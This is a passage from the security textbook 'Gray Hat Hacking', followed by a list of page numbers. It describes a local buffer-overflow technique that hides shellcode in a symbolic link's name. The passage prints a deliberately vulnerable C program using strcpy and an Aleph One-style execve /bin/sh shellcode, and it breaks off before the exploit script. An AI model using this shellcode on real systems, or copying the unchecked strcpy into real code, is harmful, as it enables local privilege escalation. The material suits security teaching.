This makes it easy to compute a return address that will hit the path every
time. The key to making this work is to get shellcode into the pathname, which you can
only do if this is a local exploit. The trick is to create a symbolic link to the program to be
exploited and embed your shellcode in the name of the symbolic link. This can be complicated
by special characters in your shellcode such as / but you can overcome it with
creative use of mkdir. Here is an example that creates a symbolic link to a simple exploitable
program, vulnerable.c (listed next):
# cat vulnerable.c
#include
int main(int argc, char **argv) {
char buf[16];
printf("main's stack frame is at: %08X\n", &argc);
strcpy(buf, argv[1]);
};
# gcc -o /tmp/vulnerable vulnerable.c
To exploit this program, you will create a symbolic link to vulnerable that contains a
variant of the classic Aleph One shellcode as listed next:
; nq_aleph.asm
; assemble with: nasm ??“f bin nq_aleph.asm
USE32
_start:
jmp short bottom ; learn where we are
top:
pop esi ; address of /bin/sh
xor eax, eax ; clear eax
push eax ; push a NULL
mov edx, esp ; envp {NULL}
push esi ; push address of /bin/sh
mov ecx, esp ; argv {"/bin/sh", NULL}
mov al, 0xb ; execve syscall number into al
mov ebx, esi ; pointer to "/bin/sh"
int 0x80 ; do it!
bottom:
call top ; address of /bin/sh pushed
; db '/bin/sh' ; not assembled, we will add this later
Gray Hat Hacking: The Ethical Hacker??™s Handbook
472
You start with a Perl script named nq_aleph.
Pages:
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826